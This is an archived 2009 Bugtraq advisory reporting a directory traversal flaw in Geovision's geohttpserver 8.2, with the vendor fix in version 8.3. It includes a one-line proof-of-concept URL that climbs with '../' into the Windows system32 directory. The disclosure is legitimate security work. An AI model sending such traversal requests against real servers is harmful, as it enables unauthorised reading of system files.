lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200902111549.n1BFnjPO004606@www3.securityfocus.com> Date: Wed, 11 Feb 2009 08:49:45 -0700 From: dejan.levaja@...sec.rs To: bugtraq@...urityfocus.com Subject: Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver) Hi. There is a Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)version 8.2. POC: http://remotehost/../../../../../../windows/system32/whatever.something PATCH: Vendor has published the new version (8.3) Regards, Dejan Levaja NSS d.o.o. dejan[dot]levaja[at]netsec[dot]rs